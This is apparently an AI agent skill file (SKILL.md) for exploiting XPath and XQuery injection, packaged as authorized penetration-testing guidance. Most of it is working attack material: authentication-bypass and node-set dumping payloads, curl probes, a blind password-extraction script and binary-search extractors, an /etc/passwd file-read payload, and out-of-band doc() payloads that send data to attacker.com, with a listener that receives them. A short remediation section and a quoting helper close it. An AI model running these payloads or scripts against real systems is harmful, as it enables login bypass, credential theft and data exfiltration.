exploiting-xpath-injection

Name: exploiting-xpath-injection
Author: xalgord/xalgorix

$npx mdskill add xalgord/xalgorix/exploiting-xpath-injection

SKILL.md

.github/skills/exploiting-xpath-injection

---
name: exploiting-xpath-injection
description: Exploiting XPath injection where applications build XPath/XQuery expressions from unsanitized user input to
  query XML documents, allowing authentication bypass and blind extraction of the entire XML document (users, passwords,
  schema) plus out-of-band exfiltration. Activates when login or search features query XML data stores via XPath.
domain: cybersecurity
subdomain: web-application-security
tags:
- penetration-testing
- xpath-injection
- xquery-injection
- authentication-bypass
- owasp
- web-security
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Exploiting XPath Injection

## When to Use

- During authorized tests where the app stores users/data in an XML file and queries it with XPath
- When login forms or search features build expressions like `//user[name='INPUT' and password='INPUT']`
- When you see XML-backed config, SOAP endpoints, or apps using `simplexml`, `DOMXPath`, `javax.xml.xpath`
- When error messages reference XPath, XQuery, or XML parsing
- When testing XPath 2.0+ engines that expose `doc()`, `unparsed-text()`, or `string-to-codepoints()`

## Critical: Variants Most Often Missed

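XPath 1.0 has no comment syntax like SQL `--`, and XPath 2.0 comments `(: ... :)` must be closed, so neither can swallow the rest of the query. Payloads must leave the whole expression syntactically valid. Remember that **`and` binds tighter than `or`**. Test this matrix on every field: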

```text
# 1. Authentication bypass (boolean tautology)
' or '1'='1            " or "1"="1            ' or ''='            " or ""="
' or 1]%00             # null-byte to cut the rest of the expression
admin' or '1'='2       # select a KNOWN account, ignore password

# 2. First-match selection (any always-true operand works)
' or /* or '           ' or "a" or '          ' or 1 or '          ' or true() or '

# 3. Conditional account selection (blind oracles)
'or string-length(name(.))<10 or'     # accounts whose node name < 10 chars
'or contains(name,'adm') or'          # first account whose name contains 'adm'
'or contains(.,'adm') or'             # first account whose current value contains 'adm'
'or position()=2 or'                  # select the 2nd account

# 4. Node-set extraction in string-output contexts (search boxes)
') or 1=1 or ('                       # get all names
') or 1=1] | //user/password[('')=('  # names AND passwords
')] | //user/*[1] | a[('              # the 1st child (id) of every user
')] | //password%00                   # all passwords (null injection)
')]/../*[3][text()!=('               # all passwords (parent step, then 3rd child)

# 5. Blind boolean extraction (substring oracle)
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_HERE)

# 6. Schema discovery (when tag names unknown)
and count(/*)=1                       # root count
and name(/*[1])="root"                # confirm tag name
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1))=105   # codepoint of a tag char
```
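To see why the tautology works even though `and` binds tighter than `or`, here is a minimal offline sketch that concatenates input into the login template from this section. `build_login_query` is a hypothetical stand-in for vulnerable application code, not any real framework's API.

```python
# Hypothetical vulnerable builder: concatenates raw input into the template
# //user[name='INPUT' and password='INPUT'] with no escaping.
def build_login_query(user: str, password: str) -> str:
    return f"//user[name='{user}' and password='{password}']"


# 1) Tautology in both fields.
print(build_login_query("' or '1'='1", "' or '1'='1"))
# -> //user[name='' or '1'='1' and password='' or '1'='1']
# XPath groups this as: name='' or ('1'='1' and password='') or '1'='1'
# Python's and/or have the same relative precedence, so the grouping can be modelled:
name_is_empty, one_eq_one, password_is_empty = False, True, False
print(name_is_empty or one_eq_one and password_is_empty or one_eq_one)  # True for every node

# 2) Known account, password ignored.
print(build_login_query("admin' or '1'='2", "anything"))
# -> //user[name='admin' or '1'='2' and password='anything']
# Grouping: name='admin' or ('1'='2' and password='anything'), i.e. just name='admin'
```

The trailing `or '1'='1'` is what makes the first predicate true for every `user` node; in the second case the false `'1'='2'` disables the whole password clause.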

XPath 2.0 file read / OOB exfiltration:

```text
# Read protected XML files one character at a time (XPath 2.0+): is the 3rd char's code point < 127?
string-to-codepoints(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1)) < 127
# Out-of-band exfiltration via doc()/doc-available()
doc(concat("http://attacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
doc-available(concat("http://attacker.com/oob/", name(/*[1]/*[1])))
# Error-based oracle (XQuery)
... and ( if ( $employee/role = 2 ) then error() else 0 )...
```
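Because `string-to-codepoints()` turns a character into an integer, a `>` comparison like the `< 127` oracle above supports binary search: about 7 requests per printable ASCII character instead of one per alphabet entry. The sketch below assumes an XPath 2.0+ engine and takes any callable `oracle(condition) -> bool` that injects a condition and reports the result; `extract_char`, `fake_oracle` and `SECRET` are hypothetical names, and the fake oracle only exists to run the logic offline.

```python
import re
from typing import Callable


def extract_char(oracle: Callable[[str], bool], expr: str, pos: int,
                 lo: int = 32, hi: int = 126) -> str:
    """Recover character `pos` (1-based) of XPath `expr` by binary search on its code point.

    Assumes the character lies in [lo, hi] (printable ASCII by default); a missing
    or out-of-range character collapses to one of the bounds.
    """
    target = f"string-to-codepoints(substring({expr},{pos},1))"
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"{target}>{mid}"):
            lo = mid + 1   # code point is above mid
        else:
            hi = mid       # code point is mid or below
    return chr(lo)


# Offline stand-in for a real oracle: evaluates the condition against a known value.
SECRET = "s3cr3t"


def fake_oracle(condition: str) -> bool:
    m = re.fullmatch(r"string-to-codepoints\(substring\(.+,(\d+),1\)\)>(\d+)", condition)
    return ord(SECRET[int(m.group(1)) - 1]) > int(m.group(2))


print("".join(extract_char(fake_oracle, "//user[1]/password", i) for i in range(1, 7)))
```

The same helper covers schema discovery when tag names are unknown, e.g. `extract_char(oracle, "name(/*[1])", 1)` for the first letter of the root element.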

### How to CONFIRM a hit (avoid false negatives)

- **Auth bypass**: `' or '1'='1` (and quote/double-quote variants) logs you in or returns a record.
- **Boolean blind**: TRUE payload returns data / differs from a FALSE payload; e.g. `...substring(...,1,1)="a"...` flips the response.
- **Node extraction**: union `|` payloads return MORE rows than the legitimate query (all names/passwords).
- **Error-based**: `error()` in an XQuery branch produces a distinct error/timing only when the condition matches.
- **OOB**: a `doc()`/`doc-available()` callback reaches your server, carrying the exfiltrated value in the path.
- Always compare against a baseline response — a stable difference (length/content/status/time) confirms injection even with no echoed data.
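A minimal sketch of the baseline comparison, assuming you record the status code and body of several TRUE-payload and FALSE-payload responses. Timing is deliberately left out because it needs repeated samples and a statistical threshold; `Fingerprint`, `fingerprint` and `stable_difference` are hypothetical helper names.

```python
import hashlib
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Fingerprint:
    status: int
    length: int
    digest: str


def fingerprint(status: int, body: str) -> Fingerprint:
    """Reduce a response to status code, body length and a SHA-256 of the body."""
    return Fingerprint(status, len(body), hashlib.sha256(body.encode()).hexdigest())


def stable_difference(true_runs: Iterable[Fingerprint], false_runs: Iterable[Fingerprint]) -> bool:
    """True only if repeated TRUE payloads agree, repeated FALSE payloads agree, and the groups differ."""
    t, f = set(true_runs), set(false_runs)
    return len(t) == 1 and len(f) == 1 and t != f
```

Pages with per-request tokens or timestamps will never produce identical digests; in that case strip the dynamic parts from the body first, or compare only status and length.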

## Workflow

### Step 1: Detect

```bash
# Break the expression and watch for XPath/XML errors or behavior change
curl -s "https://target/login" --data-urlencode "user=test'" --data-urlencode "pass=x"          # syntax error?
curl -s "https://target/login" --data-urlencode "user=' or '1'='1" --data-urlencode "pass=x"   # bypass?
```
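To triage the syntax-error probe, a small marker scan helps. The markers below are representative strings from common XPath stacks (.NET, Java, lxml, PHP, XPath 2.0 error codes); the list is not exhaustive, exact wording varies by version and error-display settings, and `looks_like_xpath_error` is a hypothetical helper.

```python
# Non-exhaustive indicators of XPath/XQuery errors leaking into a response body.
XPATH_ERROR_MARKERS = (
    "XPathException",             # .NET System.Xml.XPath.XPathException
    "XPathExpressionException",   # Java javax.xml.xpath.XPathExpressionException
    "XPathEvalError",             # Python lxml.etree.XPathEvalError
    "DOMXPath::query()",          # PHP DOMXPath warnings
    "SimpleXMLElement::xpath()",  # PHP SimpleXML warnings
    "XPST0003",                   # XPath 2.0+ static syntax error code
)


def looks_like_xpath_error(body: str) -> bool:
    """Return True if any known XPath error marker appears in the response body."""
    return any(marker in body for marker in XPATH_ERROR_MARKERS)
```

A hit on the `test'` probe but not on a clean baseline request is a strong signal; the absence of markers proves nothing, since many apps suppress errors.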

### Step 2: Authentication Bypass

```text
# Target query: string(//user[name/text()='U' and password/text()='P']/account/text())
user=' or '1'='1     pass=' or '1'='1
# Known username, ignore password:
user=admin' or '1'='2     pass=anything
```

### Step 3: Extract Data (node-set union + blind)

```bash
# Search box context: string(//user/username[contains(., 'VALUE')])
# Dump every username and password (-G sends the URL-encoded value as ?q=...):
VALUE="') or 1=1] | //user/password[('')=('"
curl -s -G "https://target/search" --data-urlencode "q=$VALUE"
```
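Since XPath has no comment to cut off the tail, it pays to check offline that a payload leaves the template balanced before sending it. This sketch uses the search template from this step; `build_search_query` and `is_balanced` are hypothetical helpers, and the check is deliberately rough (it tracks quotes and `()`/`[]` only, not full XPath grammar).

```python
# Hypothetical search template from Step 3; VALUE is concatenated unescaped.
def build_search_query(value: str) -> str:
    return f"string(//user/username[contains(., '{value}')])"


def is_balanced(expr: str) -> bool:
    """Rough sanity check: every quote closes and ()/[] nest correctly outside string literals."""
    closers = {")": "(", "]": "["}
    stack = []
    quote = None
    for ch in expr:
        if quote:
            if ch == quote:
                quote = None      # end of string literal
        elif ch in "'\"":
            quote = ch            # start of string literal
        elif ch in "([":
            stack.append(ch)
        elif ch in ")]":
            if not stack or stack.pop() != closers[ch]:
                return False
    return quote is None and not stack


for payload in ["') or 1=1] | //user/password[('')=('", "')]/../*[3][text()!=('", "')"]:
    query = build_search_query(payload)
    print(is_balanced(query), query)   # a lone "')" leaves a quote open
```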

```python
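#!/usr/bin/env python3
# Blind XPath password extraction (adapted from HackTricks)
import string

import requests

URL = "http://example.com"   # target endpoint
TRUE_MARKER = "TRUE_COND"    # text present only when the injected condition is true
alphabet = string.ascii_letters + string.digits + "{}_()"


def oracle(condition: str) -> bool:
    """Append `condition` to the numeric userid and report whether it evaluated true."""
    r = requests.get(URL, params={"action": "user", "userid": f"2 and {condition}"})
    return TRUE_MARKER in r.text


# 1) Find the password length (0 means not found within 30)
length = next((i for i in range(1, 31) if oracle(f"string-length(password)={i}")), 0)
print("[+] length:", length)

# 2) Recover each character; "{c}" is double-quoted, so the alphabet must not contain '"'
flag = ""
for i in range(1, length + 1):
    for c in alphabet:
        if oracle(f'substring(password,{i},1)="{c}"'):
            flag += c
            print("[+]", flag)
            break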
```
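The linear loops above cost up to 30 requests for the length and up to one request per alphabet entry per character. On plain XPath 1.0 (no `string-to-codepoints()`), both can still be halved: `string-length()` returns a number, so `>` comparisons work, and `contains('CHUNK', substring(...))` tests whether a character lies in half of the remaining alphabet. This is a sketch, not the HackTricks script: `find_length`, `find_char`, `fake_oracle` and `SECRET` are hypothetical, and the oracle can be any callable wrapping a request like the `requests.get` call above.

```python
import re
import string
from typing import Callable

ALPHABET = string.ascii_letters + string.digits + "{}_()"  # must not contain "'"


def find_length(oracle: Callable[[str], bool], expr: str, max_len: int = 64) -> int:
    """Binary-search string-length(expr) in [0, max_len] using numeric > comparisons."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"string-length({expr})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def find_char(oracle: Callable[[str], bool], expr: str, pos: int, alphabet: str = ALPHABET) -> str:
    """Halve the candidate set with XPath 1.0 contains() until one character remains.

    A character outside `alphabet` yields a wrong answer, so pick the alphabet generously.
    """
    candidates = alphabet
    while len(candidates) > 1:
        split = len(candidates) // 2
        if oracle(f"contains('{candidates[:split]}',substring({expr},{pos},1))"):
            candidates = candidates[:split]
        else:
            candidates = candidates[split:]
    return candidates


# Offline stand-in for a real oracle, evaluating conditions against a known value.
SECRET = "p4ss_w0rd"


def fake_oracle(condition: str) -> bool:
    if m := re.fullmatch(r"string-length\(.+\)>(\d+)", condition):
        return len(SECRET) > int(m.group(1))
    m = re.fullmatch(r"contains\('(.*)',substring\(.+,(\d+),1\)\)", condition)
    return SECRET[int(m.group(2)) - 1] in m.group(1)


n = find_length(fake_oracle, "password")
print("".join(find_char(fake_oracle, "password", i) for i in range(1, n + 1)))
```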

### Step 4: File Read / OOB Exfiltration (XPath 2.0+)

```text
# Read a text file from disk (XPath 3.0 unparsed-text(); doc() only parses well-formed XML)
' or substring(unparsed-text('file:///etc/passwd'),1,4)='root' or ''='
# Exfiltrate via OOB when no response oracle exists
doc(concat("http://attacker.com/x/", encode-for-uri(/Employees/Employee[1]/password)))
```
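On the receiving side, the OOB callback only needs a web server that logs the request path and percent-decodes it, since `encode-for-uri()` escapes reserved characters (including `/`) in the exfiltrated value. A minimal standard-library sketch, assuming the `/x/` prefix from the payload above and an arbitrary port 8000 (adjust the injected URL to match); `decode_exfil`, `ExfilHandler` and `serve` are hypothetical names.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import unquote

PREFIX = "/x/"  # must match the path used in the injected doc() URL


def decode_exfil(path: str) -> Optional[str]:
    """Return the value carried in a callback path such as /x/<encode-for-uri(value)>."""
    if not path.startswith(PREFIX):
        return None
    return unquote(path[len(PREFIX):])


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self) -> None:
        value = decode_exfil(self.path)
        if value is not None:
            print(f"[+] exfiltrated: {value!r}")
        # doc() expects XML, so reply with a minimal well-formed document.
        body = b"<ok/>"
        self.send_response(200)
        self.send_header("Content-Type", "application/xml")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port: int = 8000) -> None:
    """Listen on all interfaces and handle callbacks until interrupted."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Call `serve()` on the host that `attacker.com` points to. The XML reply only makes it more likely that the target's `doc()` call completes; the value has already arrived in the request path either way.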

## Key Concepts

| Concept | Description |
|---------|-------------|
| **XPath / XQuery** | Query languages for navigating/selecting nodes in XML documents |
| **No comment sequence** | Unlike SQL, payloads must keep the whole expression syntactically valid |
| **`and` > `or` precedence** | `and` evaluates first; craft tautologies accordingly |
| **Union `\|`** | Combine node-sets to dump data beyond the intended query |
| **Boolean/substring oracle** | `string-length()` + `substring()` to brute-force values blindly |
| **`doc()` / `doc-available()`** | XPath 2.0 functions enabling file read and OOB exfiltration |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **xcat** | Automated blind XPath retrieval (incl. OOB, file read) |
| **xxxpwn / xxxpwn_smart** | Blind XPath injection exploitation |
| **xpath-blind-explorer** | Interactive blind extraction helper |
| **XmlChor** | XPath injection exploitation tool |
| **Burp Suite Intruder** | Boolean/substring brute force with grep-match oracles |
| **PayloadsAllTheThings (XPATH Injection)** | Payload reference |

## Common Scenarios

### Scenario 1: XML-Backed Login Bypass
A login authenticates against `users.xml` via `//user[name='U' and password='P']/account`. `' or '1'='1` in both fields makes the predicate always true and returns the first account (often admin).

### Scenario 2: Search Box Data Dump
A search runs `//user/username[contains(., 'INPUT')]`. Injecting `') or 1=1] | //user/password[('')=('` unions the password node-set into the result, leaking every stored password.

### Scenario 3: Blind Extraction with No Echo
The app echoes no query results, but response length or timing differs when the injected condition is true. A `substring(password,i,1)=...` loop recovers the admin password (or its hash) character by character.

## Output Format

```
## XPath Injection Finding

**Vulnerability**: XPath / XQuery Injection
**Severity**: High to Critical (CVSS 8.1–9.8 for auth bypass / full data extraction)
**Location**: POST /login (user, pass) or GET /search?q=
**OWASP Category**: A03:2021 - Injection

### Reproduction Steps
1. Submit user=' or '1'='1 and pass=' or '1'='1 → authenticated as first account.
2. In search, send ') or 1=1] | //user/password[('')=(' → all usernames and passwords returned.
3. Blind-extract admin password with substring()/string-length() oracle.

### Evidence
| Payload | Result | Meaning |
|---------|--------|---------|
| ' or '1'='1 | Login success | Tautology bypass |
| substring(password,1,1)="p" | TRUE_COND | First char = p |
| union //user/password | Extra rows | Full document dump |

### Impact
Authentication bypass, full extraction of the backing XML document (users, passwords, schema), and on XPath 2.0 engines local file read and OOB data exfiltration.

### Recommendation
1. Use parameterized XPath (variable binding / XQuery external variables), never string concatenation.
2. Escape/encode quotes and metacharacters; validate input against strict allow-lists.
3. Disable external document access (`doc()`, network/file resolvers) in the XPath engine.
4. Store credentials hashed; avoid keeping secrets in XPath-queried XML where possible.
```
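For recommendations 1 and 2: variable binding is the preferred fix where the engine supports it (for example `$name` variables passed as keyword arguments to lxml's `xpath()`, or a Java `XPathVariableResolver`). When an expression must still be built as a string, XPath 1.0 offers no escape sequence inside literals, so a value containing both quote types has to be assembled with `concat()`. A minimal sketch of such a quoting helper; `xpath_literal` is a hypothetical name, not a library function.

```python
def xpath_literal(value: str) -> str:
    """Render `value` as a safe XPath 1.0 string literal.

    XPath 1.0 literals have no escape sequences, so a value containing both quote
    characters is split on ' and reassembled with concat().
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    pieces = [f"'{part}'" for part in value.split("'")]
    return "concat(" + ", \"'\", ".join(pieces) + ")"


# The tautology payload becomes one inert string comparison:
user = "' or '1'='1"
print(f"//user[name={xpath_literal(user)}]")
```

This neutralizes quote breakout only; allow-list validation (recommendation 2) and disabling external resolvers (recommendation 3) still apply.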
